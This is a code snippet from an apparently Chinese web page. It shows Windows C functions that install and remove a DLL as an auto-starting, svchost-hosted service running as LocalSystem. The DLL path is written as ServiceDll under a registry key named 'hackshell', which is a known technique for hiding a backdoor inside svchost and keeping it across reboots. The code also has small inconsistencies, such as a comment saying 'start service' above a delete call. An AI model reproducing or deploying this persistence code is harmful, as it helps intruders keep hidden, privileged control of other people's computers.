| 以下是代码片段: __declspec(dllexport) void RemoveService( HWND hwnd, // handle to owner window HINSTANCE hinst, // instance handle for the DLL LPTSTR lpCmdLine, // string the DLL will parse int nCmdShow // show state ) { // Open a handle to the SC Manager database. SC_HANDLE schSCManager = NULL, schService = NULL; //create service schSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS); if (schSCManager == NULL) goto cleanup; schService = OpenService( schSCManager, // SCManager database TEXT(svcname), // name of service DELETE); if (schService == NULL) goto cleanup; CloseServiceHandle(schSCManager); //启动服务 if (! DeleteService(schService) ) goto cleanup; //MessageBox(NULL, "Removed!!", "OK", MB_OK); cleanup: hsError = GetLastError(); CloseServiceHandle(schService); } __declspec(dllexport) void InstallService( HWND hwnd, // handle to owner window HINSTANCE hinst, // instance handle for the DLL LPTSTR lpCmdLine, // string the DLL will parse int nCmdShow // show state ) { // Open a handle to the SC Manager database. int rc = 0; HKEY hkRoot = HKEY_LOCAL_MACHINE, hkParam = 0; SC_HANDLE schSCManager = NULL, schService = NULL; char buffer[200]; rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, TEXT("SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost"), 0, KEY_QUERY_VALUE, &hkRoot); if(ERROR_SUCCESS != rc) goto cleanup; //create service schSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS); if (schSCManager == NULL) goto cleanup; schService = CreateService( schSCManager, // SCManager database TEXT(svcname), // name of service TEXT(svcname), // service name to display SERVICE_ALL_ACCESS, // desired access SERVICE_WIN32_SHARE_PROCESS, // service type SERVICE_AUTO_START, // start type SERVICE_ERROR_NORMAL, // error control type TEXT("%SystemRoot%\\System32\\svchost.exe -k netsvcs"), // service's binary NULL, // no load ordering group NULL, // no tag identifier NULL, // no dependencies NULL, // LocalSystem account NULL); // no password if (schService == NULL) goto cleanup; CloseServiceHandle(schSCManager); if(!GetModuleFileName(GetModuleHandle(TEXT("dllServer.dll")), buffer, sizeof buffer)) goto cleanup; rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, TEXT("SYSTEM\\CurrentControlSet\\Services\\hackshell"), 0, KEY_ALL_ACCESS, &hkRoot); if(ERROR_SUCCESS != rc) goto cleanup; rc = RegCreateKey(hkRoot, "Parameters", &hkParam); rc = RegSetValueEx(hkParam, "ServiceDll", 0, REG_EXPAND_SZ, (unsigned char*)buffer, strlen(buffer)+1); //启动服务 ControlService(schService,SERVICE_CONTROL_CONTINUE,NULL); //MessageBox(NULL, "Installed!!", "OK", MB_OK); cleanup: hsError = GetLastError(); CloseServiceHandle(schService); } |
 |
Advertisement Place |
加入收藏 网站地图 联系我们 简 繁 默 |
